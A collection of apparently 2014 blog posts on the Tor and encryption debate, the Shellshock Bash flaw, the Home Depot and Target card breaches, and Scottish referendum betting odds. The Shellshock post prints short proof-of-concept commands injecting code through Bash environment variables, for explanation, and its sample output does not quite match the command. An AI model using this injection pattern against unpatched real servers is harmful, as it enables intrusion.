Two Sides of the Argument: For Every Snowden there’s a Dread Pirate Rogers

Introduction

Connected People in NetworkThe battle between the civil rights to privacy against the rights of society to protect itself shows no signs of abating, with the FBI saying that they are concerned about Google and Apple’s move to encrypted data by default. Unfortunately, we created file systems and file content types which had little thought on keeping things private, and where systems are often viewed as stand-along machines. We also created an Internet which is full of the same protocols that we used in the days of text terminals and mainframe computers, where users typed in commands to access data, and where there was little thought about protecting the data as it is stored, analysed and transmitted. As we are increasingly move mobile, we are now carrying around our sensitive data, that at one time was protected behind physical firewalls, and the risks to our data increases by the day. To overcome this, Apple have just released their file encryption system for iOS 8, and Google plan to do the same for the next version of Android.

The FBI, though, see the status quo as a way of investigating criminals and terrorists, but can see this opportunity reducing with encryption-by-default, such as with the file encryption system used in Apple’s iOS 8. With iOS 8, there is no encryption keys, and thus the encryption method breaches current laws, which force users to reveal their encryption keys when requested by law enforcement investigators. This would mean that users may be breaching current laws in both the US and the UK. The same battle too exists with Tor, where law enforcement are scared that crime can go un-noticed, whereas privacy advocates promote the rights of privacy of using Tor. There is thus a battle ranging from the file system to the data transmitted over the Internet.

Exception to the 5th Ammendment Right

In the UK, citizens have the right to silence (a Fifth Amendment Right in the US – related to the right against self-incrimination) but there is an exception to this related to encryption keys, and the failure to reveal encryption keys can often be seen as a sign that someone has something to hide, and is covered by Section 49 of RIPA. The move by Apple and Google may thus breach law as they must be able to hand-over their encryption key when required. This was highlighted in 2014 when Christopher Wilson, from Tyne and Wear was jailed when he refused to hand encrypted passwords related to investigations related to an attack on the Northumbria Police and the Serious Organised Crime Agency’s websites. He handed over 50 encrypted passwords, but none of these worked, so a judge ordered him to provide the correct one, but after failing to do this, he received a jail sentence of six months.

In 2012, Syed Hussain and three other men, were jailed for discussing an attack on a TA headquarters using a home-made bomb mounted on a remotely controlled toy car. Syed, who admitted have terrorist sympathises, was jailed for an additional four months for failing to hand-over a password for a USB stick.

The opposing sides

As we move into an Information Age, there is a continual battle on the Internet between those who would like to track user activities, to those who believe in anonymity. The recent Right to be forgotten debate has shown that very little can be hidden on the Internet, and deleting these traces can be difficult. The Internet, too, can be a place where crime can thrive through anonymity, so there is a continual tension between the two sides of the argument, and, overall, no-one has a definitive answer to say which is correct.

To investigation agencies the access to Internet-based information can provide a rich source of data for the detection and investigation of crime, but they have struggled against the Tor (The Onion Network) network for over a decade. Its usage has been highlighted over the years, such as when, in June 2013, Edward Snowden, used it to send information on PRISM to the Washington Post and The Guardian. This has prompted many government agencies around the World to prompt their best researchers to target cracking it, such as recently with the Russian government offering $111,000.

At the core of Tor is its Onion Routing, which uses subscriber computers to route data packets over the Internet, rather than use publically available routers. One thing that must be said is that Tor aims to tunnel data through public networks, and keep the transmission of the data packets safe, which is a similar method that Google uses when you search for information (as it uses the HTTPS protocol for the search).

The battle of the Gods

fotolia_1499904With the right to be anonymous at its core, the Tor project created a network architecture which anonymized both the source of network and the identity of users. With some many defence agencies around the World targeting Tor, the cracks have been starting to be exposed, in the same way that there has been on the targeting of OpenSSL and TrueCrypt. For this researchers identified an underlying flaw in Tor’s network design, and which has led the Tor Project has warned that an attack on the anonymity network could have revealed user identities.

This message was in response to the work of two researchers from Carnegie Mellon University (Alexander Volynkin and Michael McCord) who exploited the infrastructure. At present SEI has a Defense Department until June 2015, and is worth over $110 million a year, with a special target on finding security vulnerabilities.

Overall the attacks ran from January 2014, and were finally detected and stopped on 4 July 2014. In response to the vulnerability being found the Tor team, in a similar way to the OpenSSL Heartbleed announcement, where informed that the researchers were to give a talk at the Black Hat hacker conference in Las Vegas. The sensitives around the area is highlight by the fact that the talk was cancelled, due to neither the university nor SEI (Software Engineering Institute) approving the talk. The Tor project, through Roger Dingledine blog entry on 4 July 2014, revealed that identities could have been revealed over the period of the research.

Tor

The Web traces a wide range of information, including user details from cookies, IP addresses, and even user behaviour (with user fingerprints). This information be used to target marketing to users, and also is a rich seem of information for the detection and investigation of crime. The Tor network has long been a target of defence and law enforcement agencies, as it protects user identity and their source location, and is typically known as the dark web, as it is not accessible to key search engines such as Google. Obviously Tor could be used to bind to a server, so that the server will only talk to a client which has been routed through the Tor network, which would mean than search engines will not be able to find the content on them. This is the closed model in creating a Web which cannot be accessed by users on the Internet, and only by those using Tor. If then users trade within the dark web servers with Bitcoins, there will be little traces of their transactions.

With the Tor network, the routing is done using computers of volunteers around the world to route the traffic around the Internet, and with ever hop the chances to tracing the original source becomes reduces. In fact, it is rather like a pass-the-parcel game, where game players randomly pass to others, but where eventually the destination receiver will eventually receive the parcel. As no-one has marked the parcel on its route, it’s almost impossible to find out the route that the parcel took.

The trace of users access Web servers is thus confused with non-traceable accesses. This has caused a range of defence agencies, including the NCA and GCHQ, to invest methods of compromising the infrastructure, especially to uncover the dark web. A strange feature in the history of Tor is that it was originally sponsored by the U.S. Naval Research Laboratory (which had been involved in onion routing), and its first version appeared in 2002, and was presented to the work by Roger Dingledine, Nick Mathewson, and Paul Syverson, who have since been named, in 2012, as one of Top 100 Global Thinkers. It since received funding from Electronic Frontier Foundation, and is now developed by The Tor Project, which is a non-profit making organisation.

Thus, as with the Rights to remain private, there are some fundamental questions that remain, and it a target for many government around the World. In 2011, it was awarded the Free Software Foundation’s 2010 Award for Projects of Social Benefit for:

"Using free software, Tor has enabled roughly 36 million people around the world to experience 
freedom of access and expression on the Internet while keeping them in control of their privacy 
and anonymity. Its network has proved pivotal in dissident movements in both Iran and more recently 
Egypt."

Figure 1 shows a Web browser application setup for Tor. It uses onion routing and also the HTTPS protocol to secure the accesses. With Tor, too, the path between the two communicating hosts is also encrypted, which creates a tunnel between them. To focuses more on the security of the communication over the Internet, and less on the preserving the anonymity of the user. It is, though, often used for proxy accesses to systems, where a user wants to hide their access.

newFigure 1: Tor Web browser

Silk Road

One of the first of large-scale illegal uses on Dark Web was Silk Road (created Feb 2011) by “Dread Pirate Rogers” and which was used to trade drugs on-line. In June 2011 it was pin-pointed by chatter on the Internet and for increases in Web traffic, and was taken down by the DEA and Department of Justice in the US. It has since resurfaced as Silk Road 2.0, with other similar sites appearing, along with encrypted versions of the code from the site being created so that the site can be distributed to other places, if it is taken down. This approach is equivalent to self-healing Web sites, where the re-build themselves when they are attacked. In this case, a human helper will normally be involved in re-creating the site.

While Tor had been created for all the best of reasons, from another point-of-view, it can be seen as a place that criminals can build their businesses in the Cloud, and provide a place where there can be few traces left of their activities. Overall it’s an impossible debate to say exact which is the right approach. From a law enforcement point-of-view, there are problems in investigating sites bound into the Tor network, but it also it is also a place where citizens have the rights to privacy.

Conclusions

With data breaches rising by the day, such as with 150 million passwords cracked with the Adobe infrastructure and over 120 million credit card details skimmed for Home Depot and Target, Apple and Google feel they have to build up trust with their users in their operating system. For this they are looking at encryption-by-default, where they encrypt file data (which is now stored on flash memory), and which now may breach the laws around reveal encryption keys. At one time, investigators could extract the memory from the device, and decode its contents, but without encryption keys this will be difficult. While Google and Apple have not responded to the dilemma, there could be the opportunities for them to work with the companies to overcome of the issues, which might reduce privacy settings on their data. Unfortunately if they do reduce the security on the encrypted data, they may leave open opportunities for others to learn the methods, and compromise the whole system. In a corporate market, Microsoft BitLocker is one of the most popular methods used for complete disk encryption. With this, there is always the back-door input into the encrypted data, by storing the encryption keys within the domain controller for the company.

As yet, Google or Apple have not made any comments about the issues that they encrypted file system could cause mobile phone users.

Shellshock – It is serious, but it is no Heartbleed

Introduction

Cartoon hacker with laptopAfter years of Microsoft Windows vulnerabilities, we find that the new place for vulnerabilities has moved to discovering sloppy programming in Java, Abode Flash, and Adobe Reader,  and now Linux – and a common denominator is often the C++ programming language. The targets this time is not desktops, but Linux servers using Bash (GNU Bourne Again Shell), which is the command line interpreter used in many Linux based systems, including Apple OS X. The most significant recent vulnerability was Heartbleed (CVE-2014-016), which allowed an intruder to send a heartbeat request within secure communications with a Web server (using HTTPS), and for the server to return back the contents of the running memory on the server. This revealed things such as usernames, passwords and encryption keys. While a serious problem, Shellshock in no way as serious as Heartbleed, which had the potential to crack open most of the secure communications on the Internet, and provide a large-scale method to reveal secret information.

Whenever a new vulnerability is discovered it is assigned a CVE number, which is CVE-2014-6271 for Shellshock. Once announced there were new patches roll-out , but these still do not seem to fix all the problems, including with a secondary problem: CVE-2014-7169 (which is a less severe problem). Administrators of Linux systems, though, are advised to patch their systems, and not wait for an update to CVE-2014-7169.

Bash interprets the commands that users enter or are run from scripts, and then makes calls to the operating system, such as for running programs, listing the contents of a directory, or in deleting files. The discovered flaw allows intruders to remotely run arbitrary code on systems such as Linux servers including for web servers, routers, and many embedded systems. It was discovered by Stephane Chazelas of Akamai, who found that code at the end of a function of an exported variable is run whenever an environment variable is used within the Bash environment. Many Linux programs use environmental variables to pass parameters between programs, and the flaw thus allows for code to be inserted into a program whenever these environmental variables are called.

It should be noted that although the opportunity for exploit is large, especially on embedded devices, the security on the system needs to be low in order for it to be exploited.

Shellshock

While Heartbleed was a serious vulnerability, where the memory of a server could be viewed. In the case of Shellshock it only focuses on CGI script. These are old-fashioned scripts that allow commands to be processed using a scripted language. While popular in the past, it has been largely replaced by PHP and other high-level scripting programs. In most cases CGI scripts reside in the /cgi-bin folder. For GNU Bash through 4.3, trailing strings after a function are processed in the definitions of environment variables. This allows intruders to execute arbitrary cod. For example, we have a function named mybugtest:

billbuchanan@Bills-MacBook-Pro:/tmp$ export mybugtest='() { :;}; echo I AM BUGGY'
billbuchanan@Bills-MacBook-Pro:/tmp$ bash -c "echo Hello"
 I AM BUGGY
 Hello

It is in no way as serious as Heartbleed, and in a well-secured server, it is unlikely that it the intruder can do any real damage to the system. This would be done by injecting a payload of code into the environment variables of a running process. When the process is started, the code is injected into the running program, in the same way as a user typing in some user input.

The code which can appear at the end of the Bash function can be fairly complex, and allow an intruder to inject code into the shell (and thus into running programs). In this example we copy some text into a text file (named newfile) and then copy the file to a new file (newfile2):

$ export mybugtest='() { :;}; echo "This is my new file..." > newfile; cp newfile newfile2'
$ bash -c ""
Segmentation fault: 11
$ ls myf*
myfile   myfile2
$ cat myfile2
This is a test

In this case we could move files around, but we couldn’t move a file to a privileged folder, as that would need administrator rights. In a well secured environment, the damage that Shellshock can cause should be minimal, as most of the important operations require a higher-level privilege. It is this attribute of Shellshock that highlights that this is not another Heartbleed, as Heartbleed allowed anyone to access the privilege area of memory on the server, without any restrictions. While Web servers may be safe, with a limited usage of cgi-bin scripts (which allow privileged access to the system), there may be risks with poorly secured embedded systems, which can often use scripts to setup their services.

Buffer overflows and underruns

The flaw within Bash, shows how sloppy software developers have been in the past, and it is a flaw which has existed for over 25 years without being discovered. Many of the problems being under covered have been caused by poor software coding in the C++ programming language, which often allows programs to act incorrectly when the input data is not formatted as expected. Once common method of exploiting a C++ program is a buffer overflow, where a certain amount of memory is allocated to variables, and where the user enters data which is more than the allocated memory, and which causes other parts of the memory to be overwritten, and cause the program to act incorrectly.

In the case of Heartbleed it was a buffer underrun which caused the problem, where an area of memory was read and which did not actually contain the required amount of data to fill it. If you are interested in Heartbleed, and its cause (OpenSSL):

Conclusions

In no way is this another Heartbleed, which truly was a major problem, where any intruder could run a simple exploit on any server, and the memory was released. There is the possibly of an injection of remote code, but the risks are in no way as bad as Heartbleed.

At one time, many Linux systems used many CGI scripts, but often these were difficult to read and update, so they have been migrated away with newer languages, such as for C#, Java, C++, ASP and PHP. Administrators should examine their /cgi-bin and make sure there are no vulnerable scripts in there, and, at the very least, patch their systems.

The key difference here between Heartbleed and Shellshock, is that ANYONE in the World could exploit Heartbleed, just by sending malicious network packets to remote servers, where virtually every Linux-based Web site ran the OpenSSL program which made them vulnerability. With Shellshock, there needs to be high-level rights given to a remote user, and also access to scripts running in the cgi-bin for it to be vulnerability. If the system is well protected, everything should be okay, for Heartbleed, there was no protection, and the Internet shook at its core for a few weeks.

 

Passwords and Credit card details – Shooting Fish in a Barrel

Introduction

Imagine if all the banks in the UK decided to send out new credit cards to all their customers, but they were all lost in the post, and all the details ended-up for sale on a Web site on the Internet. Well, the recently discovered Home Depot hack had a similar scope, where at least 56 million credit and debit card details could have been compromised from all of it 2,200 stores in the United States, and possibly 287 stores Canada, Guam, Mexico, and Puerto Rico. It is thought that the US and Canadian stores were the most at risk.

The risks around intruders stealing passwords and credit cards show no signs of abating, with the new announcement that Home Depot point-of-sale points had a malware agent installed on them and which could have resulted in over 56 million credit and debit cards details being stolen. The Home Depot looks to have increased on the recent Target hack which exposed an estimated 40 million cards. Overall the main problem seems to be that companies have setup a whole lot of back-end defences, but have forgotten that once the intruder has a touch-point in the network, they can often go undetected.

Along with the risks around point-of-sale devices, the risks around XSS (Cross-site Scripting), caused by sloppy coding, also show no signs of abating, and the recent e-Bay hack and the 1.2 billion usersnames and passwords stolen, show that there are significant risks in the way that e-Commerce infrastructures have been created.

e-Bay hack

e-Bay was recently exposed as having a problem where customers are tricked into giving over their personal data. With this a non-malicious account is hi-jacked, and used to setup a fake listing, each of which typically had 100% positive feedback and many associated sales. Users of the compromised account typically see themselves locked-out of their account, and later billed for selling fees. This problem has existed since February 2014, and many experts reckon that it still exists on the site.

The compromised account then creates a link to a fake e-Bay page, which has code injected into the e-Bay page and where the buyer is asked for their login and bank account details. As far as the buyer sees it is coming from a valid e-Bay page, and just asking for their details to confirm the purchase. Unfortunately it uses JavaScript and Flash injection to fake the site, and where the data entered is sent to the intruder. As far as the buyer is concerned everything is coming from e-Bay. This is all done through the main “shooting fish in a barrel” method of cross-site scripting (XSS).

An example is XSS is given in the following demonstration:

Home Depot exploit

For the Home Depot exploit, intruders installed malware at the point-of-sale, and which was similar to the recent Target back, in order to gather collect customer data from their cash registers. It is likely that this ran from April 2014 to the beginning of September 2014, before it was finally detected. The company have just announced that it has now made sure that they have gotten rid of the malware, but this is no defence against the customers who have already had their credit card details compromised.

The lesson learnt must be to try and reduce the time it takes to detect a threat, and quickly respond to it. So as the back-end financial services become more security, hackers will focus more on the point-of-sale, and thus retailers such as Home Depot need to spend more effort detecting exploits, as much as they do on data protection.

Overall it is expects that the breach will cost Home Depot at least $62 million, showing that money spent on detection and prevention in security is often a good investment. A brand can also be damaged with a loss of respect by customers. The hack, for example, against the Sony PlayStation Network is thought to have cost Sony $170 Million in direct costs, and led to major damage on their brand.

History repeats with a new Target

The Home Depot hack is likely to be greater that the preceding Target hack, which resulted in a large number of credit and debit card appearing on the credit card clearing house site: rescator.cc . From the Target attack, there have been batches defined as “American Sanctions” and “European Sanctions”, and some speculate that it was retribution on penalties imposed by the West on Russia for their actions in Ukraine.

Stolen card data on Rescator.cc (Figure 1) can command prices up to $100 for each credit card details, and it has become one of the largest clearinghouse for breaches, with many hundreds of thousands of cards being sold in a single batch. It can be seen from the meta details from the site, that they buy and sell credit card details, including CVV details:

<title>Rescator.CC - Buy Dumps Shop & Credit Cards with cvv2</title>
<meta name="keywords" content="dumps shop, credit cards cvv, credit cards cvv2, 
dumps, dumps with pin, cvv2, buy dumps, buy credit cards, buy creditcard, buy cvv, 
buy cvvs, d+p, sell dumps, buy dumps, buy cvv, buy cvv2, sell dumps, sell track2, 
buy track2, buy cards, cheap cvv, buy cvv, sell cvv, fresh cvv, good cvv, buy 
good cvv, sell good cvv, best cvv, check cvv, cvv2 dump, buy cvv online, sell cc, 
dump shop" />
<meta name="description" content="Buy Dumps Shop of Superior Quality. 
Track1 & Track 2. Valid rate of %90. Feedbacks on many forums.">
<script type="text/javascript">

Screen Shot 2014-09-22 at 12.38.34Figure 1: Recator.cc

If we look at the information graphic from Information is Beautiful (Figure 2) related to the World’s Biggest Data Breaches, we can see that the Home Depot hack is not as large as the Adobe hack, but in scope it could be great, as the Adobe back just targeted usernames and passwords (150 million of them), whereas everyone of the credit card details stolen from Home Depot is at risk as a major finance fraud. The Target one (in Figure 2) shows 70 million suspected data breaches. For the Adobe hack, the Top 5 passwords used by users where: “123456“, “123456789”, “12345678”, “password” and “adobe123″, which are about as easy to crack as having no password at all – truly shooting fish in a barrel. From the graphic we can also see the Sony hack, with 77 million records compromised in 2010.

Recently, too, it was detected that a Russian gang had stolen over 1.2 billion user names and passwords, purely by using compromised bot agents to exploit poorly written code on Web sites, using XSS (Cross-site Scripting) vulnerabilities.

Screen Shot 2014-09-22 at 13.18.53.fwFigure 2: World’s Biggest Data Breaches (brown represents an interesting story) Ref: [here]

Those who might be affected by the hack can check at https://homedepot.allclearid.com/, where Home Depot have setup a collaboration with AllClear ID, who will allocate a dedicated investigator to recover any financial losses affected by the hack. It covers one year from the date of the announcement (8 Sept 2014), with a strong central message about the breach of their site (Figure 3).

Screen Shot 2014-09-22 at 15.33.59Figure 3: Home Depot site showing payment breach message

Conclusions

The “shooting fish in a barrel” analogy seems flippant, but it can be seen that as the defences have toughened up on the back-end, the real risk is now at the front-end, which is exposed to a range of environments. If each credit card detail is worth up to $100, there is thus a lucrative market out there to find new ways to shoot the fish.

While initially it was though that the same malware had been used in the Home Depot hack as to that implemented in the Target hack, it is now thought that it is a completely new, and unseen, malware, showing that malware often transforms itself to overcome obstacles. With considerable amount of money to be made from capturing credit card details, there can thus be a considerable investment made on creating new types of malware, and fund a whole R&D department on the hacker’s side.

It’s amazing how quickly we have created our e-Commerce infrastructure, but we are all in-danger of large-scale fraud, and it has damage to both citizens, and also to our economy, so we need to invest more in design, implementing, detecting, protecting and analysing our electronic infrastructures, as every electronic device can be exposed to threats.

In terms of the e-Bay hack, it is the same old story of sloppy code, where the developer does not check for user input, and where code is injected into a page to make it work incorrectly.

Post-analysis of Scottish Independence Vote

Introduction

Fotolia_64516645_SOver the past few weeks I have being doing some analysis of the odds around the Scottish Independence Referendum, so let’s now see how the predictions actually went.

The final average odds for a No were 1/5 (5-to-1 on), with 4/1 for Yes vote. This seemed to go against the opinion polls at the time, so we analyse some of the trends around their predictions, and see where they got things right, and where they missed on the understanding of the dynamics. We’ll see that they basically got most things right, but missed out a bit on the head v heart analysis. They did though predict the result more clearly than the opinion polls did, which perhaps highlights a stronger understanding of human nature, and that highly skilled punters, too, can spot the correct odds for the current market.

Largest moves towards Yes or No

The bookies predicted that Dundee was the favourite for the strongest Yes, and so it was. In second and third place was Clackmannanshire and Glasgow. Table 1 and Figure 1 outlines the results, where it can be see that the Top 3 for the largest Yes vote in percentage terms were actually Dundee, West Dunbartonshire and Glasgow, so the bookies actually got No 1 and No 3 correct. Clackmannanshire, which was the first to be announced, actually ended up in 12th place. In terms of change, Inverclyde, Renfrewshire, North Lanarkshire and South Ayrshire show the greatest changes towards a Yes, while Clackmannanshire, Angus and Moray showed a stronger move towards No, where Clackmannanshire, which was 2nd favourite for the highest No vote ended up in 12th place. The writing was on the wall straight after Clackmannanshire was announced, as it was a No majority for the 2nd favourite for a Yes.

If we assume anything between +3 and -3 is roughly correct, the bookies managed to predict the following: Dundee City, Glasgow, East Ayrshire, Falkirk, South Lanarkshire, West Lothian, Midlothian, Argyll & Bute, Aberdeen City, Edinburgh, East Dunbartonshire, East Lothian, East Renfrewshire, Shetland Islands, Highland, Dumfries & Galloway and Scottish Borders. So the bookies have predicted more than 50% for share (17 out of 32).

They underestimated the strength of the Yes vote for West Dunbartonshire (-9), North Lanarkshire (-11), North Ayrshire (-12), Fife (-7) and South Ayrshire (-12), and underestimated the strength of the No vote for Comhairle nan Eilean Siar (+6), Stirling (+10), Perth & Kinross (+6) and Orkney Islands (+6). Orkney, which was predicted to be in 26th place, actually end up with the strongest No vote.

Table 1: Actual result and predicted place from odds

chart04chart06Figure 1: Actual result and predicted place from odds (-ve shows stronger Yes than prediction, and +ve shows a stronger No than prediction).

So … who won Punters or Bookies? Winner: Bookies.

Head over heart?

One thing that sticks out is the vote in Aberdeenshire, which was No 9 in most likely to vote for a Yes, but they ended-up at No 24. What seems to have happened is the Aberdeenshire is a strong SNP area, but, perhaps, the head ruled the heart … where the relative affluence of the area overruled the strong independence focus. Angus and Moray too are strongly SNP, but have gone more with their head, as both areas too are fairly affluent. The bookies obviously predicted that the heart would rule the head in these areas, and that’s why they didn’t manage to predict them in the correct position.

For heart over head, Dundee, Glasgow, and East Ayrshire were predictable; it was other West Coast areas which showed the great head over heart movement, including South Ayrshire moving from one of the least likely (No 31) to somewhere nearer the middle of the table. Renfrewshire and Inverclyde, though, stormed through the odds with massive heart over head turnaround.

East v West?

Scotland is changing as a nation, and the referendum vote perhaps highlights this in relation to the changes in the odds and the results. Table 2 should a rough split between North/South, West and East and tallies-up the scores for each. It can be seen that West scores -77 in changes, where many of the regions in the West produced stronger than predicted results, and the East scores a positive value of +69. The North/South also scores a positive with +8.

Table 2: East, West and North/South

chart10There are generally different demographics between the east and west of Scotland, with a migration of population from west to east. Edinburgh, for example, now has a population of 487,500 (nearly 10% of the total population of Scotland), and is growing at a rate of 1% each year. It also has a fairly young population, with 23.8% aged 16 to 29 years (as opposed to an average of 18.3% over Scotland). Midlothian, West Lothian and East Lothian have also been growing at a fairly fast rate, possibly due to the effect of a strong economy in Edinburgh, as opposed to failing populations in the West of Scotland. The areas of Moray and Angus have also seen growth due to the success of Aberdeen as a major Oil & Gas hub.

The different demographic is also highlighted with Glasgow has a life expectancy of 71.9 for males as opposed to Edinburgh where it is 77.2. This trend is not consistent, though, with areas such as East Dunbartonshire, appearing 26 out or 32, and having an average male life expectance of 79.4.

So who won in changing perception … East or West? East Coast.

Odds variation

The odds over the last few weeks did not reflect the opinion polls, especially in the last week or so, where No stayed around 1/4 and Yes started drifting out to 3/1, even as the polls were narrowing the gap. As the polls over the past few days showed the difference between Yes and No narrowing, the bookies started to push the odds out for a Yes. Figure 2 shows the variation of the odds for a Yes vote. It can be seen that there were a good deal of variations over August and September, but the bookies ended up with a fairly consistent consensus.

As seen in Figure 3, the high point of the campaign (in terms of the Yes vote odds) was 7 Sept, where the average odds came into 2.78, followed by a drift out to 4.39 by 13 Sept, and a slight drift-in to 3.91, but the last two days showed a drift out. Generally the odds didn’t quite mirror the opinion polls, which tended to narrow the gap over the week before the vote:

18 Sept: 4.52 (Out)
17 Sept: 4.23 (Out)
16 Sept: 3.91 (In)
15 Sept: 4.03 (In)
14 Sept: 4.19 (In)
13 Sept: 4.39 (Out)
12 Sept: 4.06 (Out)
11 Sept: 3.49 (Out)
10 Sept: 2.78 (Out)
09 Sept: 2.85 (Out)
08 Sept: 2.82 (Out)
07 Sept: 2.78 (In)

chart02Figure 2: Variation of No odds

chart03Figure 3: Yes odd for 30 days before poll

Key breakpoints

While the betting odds were fairly robust around opinion polls, there were three key break points that drove the odds:

  • Break point 1 (Darling wins). A key change took place around the 5 August debate, where the odds for a Yes vote odds had been dropping before the debate, but after it, the average odds for a Yes Vote moved steeply up (dropping one point in the days before the debate, and then rising 1.2, for four days after it):

9 Aug 5.75
8 Aug 5.43
7 Aug 5.05
6 Aug 5.05
5 Aug 4.54
4 Aug 4.39
3 Aug 5.5

  • Break point 2 (Salmond wins). On the day before the second debate there was a peak Yes Vote odds of 6.3 (22 August 2014), and this has since fallen to nearly 4 ( 31 August 2014). The largest changes in the odds have thus occurred around the debate points, with 5 August 2014 having 31 changes (where general the No vote odds have drifted out) and nine changes on 23 August 2014. Also, typically, there is an increasing rate of change of the odds as we move closer to the vote.
  • Break point 3 (Opinion polls come together, odds drift out). In the last three days before the vote, the opinion polls were showing a coming together, with one or two showing the Yes vote winning, but the odds started to drift out for a Yes, with some bookies (Betfair) actually paying out early, and other suspending the betting. The last two data points on Figure 3 show this trend.
So … who won … Opinion Polls or Bookies? Winner: Bookies.

% Share of the Vote

The opinion polls were putting the difference between Yes and No within just a few points in the last few days. The bookies though were still predicting 45-50% for a Yes vote, and this is where it ended-up. In the end the bet for 45-45% was 2.1 (which is almost an even money bet). It can be seen from Figure 4 that the prediction was for the lower end as the odds for 40 to 45% are much lower than 50-55%:

40% or less 6.8
40 to 45% 3.5
45 – 50% 2.1
50 – 55% 5.1

chart07Figure 4: Percentage share for Yes vote

So … who won … Opinion Polls or Bookies? Winner: Bookies.

Prediction on turn-out

The best bet of all was actually related to the how well the Scottish electorate did in turning-out. The actual turn-out was 83.9%, which few could have predicted, and the bookies got this right in terms of the favourite with 7/4, but it was an excellent bet, as there was a nearly 9% difference in the lower end of the bet:

>75% 7/4
70% – 75% 12/5
60% – 65% 5/2
65% – 70% 14/5
55%- 60% 23/5
55% 23/5

So … who won … Opinion Polls or Bookies? Winner: Bookies.

Wayback

Do you want to see the odds the day before the election? Well we can look in the Wayback engine here.

Conclusions

What was surprising in the run-up to the vote was that the bookies were not reflecting the trends of the opinion polls. While the opinion polls were getting closer, the odds for a Yes were drifting out. One of them was going to be wrong, and it looks like the bookies where predicting the result more accurately, and not going with the trends in the opinion polls. This perhaps shows that bookies understand the dynamics of human nature than targeted sampling.

The split between east and west cannot be ignored in terms of the prediction in how they would vote, with the West showing strong movement towards Yes, and the East, generally, away from it. Perhaps the risks around finance sector and Oil & Gas on the East Coast operated more for the head than the heart? In the west, there seems to have been a strong heart pull.

Which was the best bet? Ans: the Scottish People. Bookies gives odds of 7/4 for >75%, and where the end turn-out end up at 83.9%.

Further Analysis of Betting Odds for Scottish Independence Referendum

Please refresh your browser cache for the most up-to-date charts.

Introduction

Fotolia_64516645_SWith just one day to go to the vote, this analysis outlines the current odds, and may give some pointers to the outcome. The data used in this analysis looks back at the daily odds for a Yes vote from 23 bookmakers over the last five months (1 April – 17 September 2014).

Even in the day before the vote, there is a great deal of change with the average decimal odds for a Yes Vote at 4.3, and which has drifted out from 3.91 (16 September 2014). There’s a bit of movement that isn’t quite consistent, as 14 have odds which are lengthening for a No vote, and six with odds reducing. For the Yes vote with odds sit at 1.22 which has drifted in from 1.28 (16 September 2014). A typical vote is 1.22 (2/9) for No and 4 (3/1) for Yes. So at this point there is still a fairly wide gap in the odds.

Figure 1 outlines the odds for the past five months. It can be see that the odds for a No vote are approximately where they started off with at the start of May 2014, with a large drift out at the start of September 2014, but drifted back in over the last few weeks.

Figure 1: Odds on a Yes vote (using decimal odds)

Outline of odds

In the independence poll, there are only two horses in the race, so there is either a Yes or a No bet. The way that odds are normally defined is the fraction which defines the return, so Evens is 1/1, where for every £1 bet, you will get £1 back in addition to your stake (so you get £2). If the odds are 2/1 (2-to-1 against), you get £2 back plus your stake (so will get £3 on a win). For 1/2 (or 2-to-1 on), you get half your money back, and you’ll get £1.50 on a win. These types of odds are known as fractional odds, where the value defines the fraction for your payback. The multiplier, though, does not show your stake coming back to you, so decimal odds are used to represent this, and defines a value which is multiplied to the stake to give the winning amount (basically just the fractional odds plus 1, and then represented as a decimal value).

The factional odds value of Evens gives a decimal odds value of 2 (where you get £2 back for a £1 stake), and 2/1 (2-to-1 against) gives 3.0, while 1/2 (2-to-1 on) is 1.5. In terms of roulette, Evens would define the odds for a bet of Red against Black (as each are equally probable). In roulette, though, the odds are slightly biased against the player for a Red v Black bet, as 0 changes the odds in favour of the casino. For betting, overall, bookmakers try to analyse the correct odds so that they have attractive ones (if they want to take the best), against others. If they take too much of a risk, they will lose, so their odds around the independence vote should be fairly representatives of the demand around bets, and the current sentiment around the debate.

Percentage share of the vote and turnout

Figure 1 outlines the decimal odds for the Yes vote, and it perhaps reflects the closeness of the vote, with an Evens money bet for a share between 45 and 50%, with 3.5 for 40% to 45% and 5.1 for 50% to 55%:

40% or less 6.8
40 to 45%    3.5
45 – 50%     2.1 (approx Evens).
50 – 55%     5.1

In terms of the turnout, the favourites are over 85% and between 80 and 85%:

Over 85%  2.62
80 – 85%    3
75 – 80%    3.5
70 – 75%    5.5
65 – 70%    17

chart04Figure 1: Percentage share for Yes vote (17 Sept 2014)

The Trend

The trend for the last 30 days is shown in Figure 3. The key turn-around in the odds for the No vote happened after 22 August, where the odds were as high as 6.27. They generally slipped over the weeks after that hitting a plateau around 7 Sept until 10 Sept 2014 (down to 2.78), and rose back up to 4.39 over the next four days, and have started to come back down over the past four days. The past day, though, has seen them rise again, perhaps outlining the small lead in the polls for a No vote.

Figure 3: Yes odds for the past 30 days

Figure 4 shows the variation of the odds over the 30 days for the Yes vote odds, and highlights the drift out of the Yes vote around 8 Sept 2014.

Figure 4: Yes Vote odds for 23 bookmakers over August 2014

Geographical trends

In terms of voting for the place that is most likely to have the strongest Yes vote, Dundee has been out in-front for many months, with current odds of them having the largest Yes vote at 1.5 (1/2), and quite a long way in front of the Clackmannanshire (5/1) and Glasgow (8/1). Table 1 outlines the split of the Top 10 most likely to vote Yes (in terms of betting odds), and the Top 10 least likely to vote Yes. Of the areas which are the strongest, it is difficult to generalise, but the Highland areas, and the West of Scotland are strongest, whereas the South of Scotland, East of Scotland, and the Northern Isles the least likely (based on the odds).

Overall the major polulation areas on the east coast of Scotland, apart from Dundee, are generally in the bottom half of the geographical split, with Edinburgh (23th out of 32) and Aberdeen (19th out of 32):

  • Dundee (1st out of 32).
  • Glasgow (3rd out of 32).
  • Stirling (12th of 32).
  • Perth (17th out of 32).
  • Aberdeen (19th out of 32).
  • Inverness (22nd out of 32).
  • Edinburgh (23rd out of 32).

Table 1: Geographical split on most likely to have the strongest (and weakest) Yes vote

Top 10 to Vote Yes Top 10 least like to vote Yes
1. Dundee (most likely) 23. Edinburgh
Clackmannanshire Renfrewshire
Glasgow East Lothian
Na h-Eileanan Siar Orkney
Angus Shetland
Moray Scottish Borders
East Ayrshire East Dunbartonshire
Falkirk East Renfrewshire
Aberdeenshire South Ayrshire
10. Highland 32. Dumfries and Galloway (least likely)

The key changes

A key change took place around the 5 August debate, where the odds for a Yes vote odds had been dropping before the debate, but after it, the average odds for a Yes Vote moved steeply up (dropping one point in the days before the debate, and then rising 1.2, for four days after it):

9 Aug 5.75
8 Aug 5.43
7 Aug 5.05
6 Aug 5.05
5 Aug 4.54
4 Aug 4.39
3 Aug 5.5

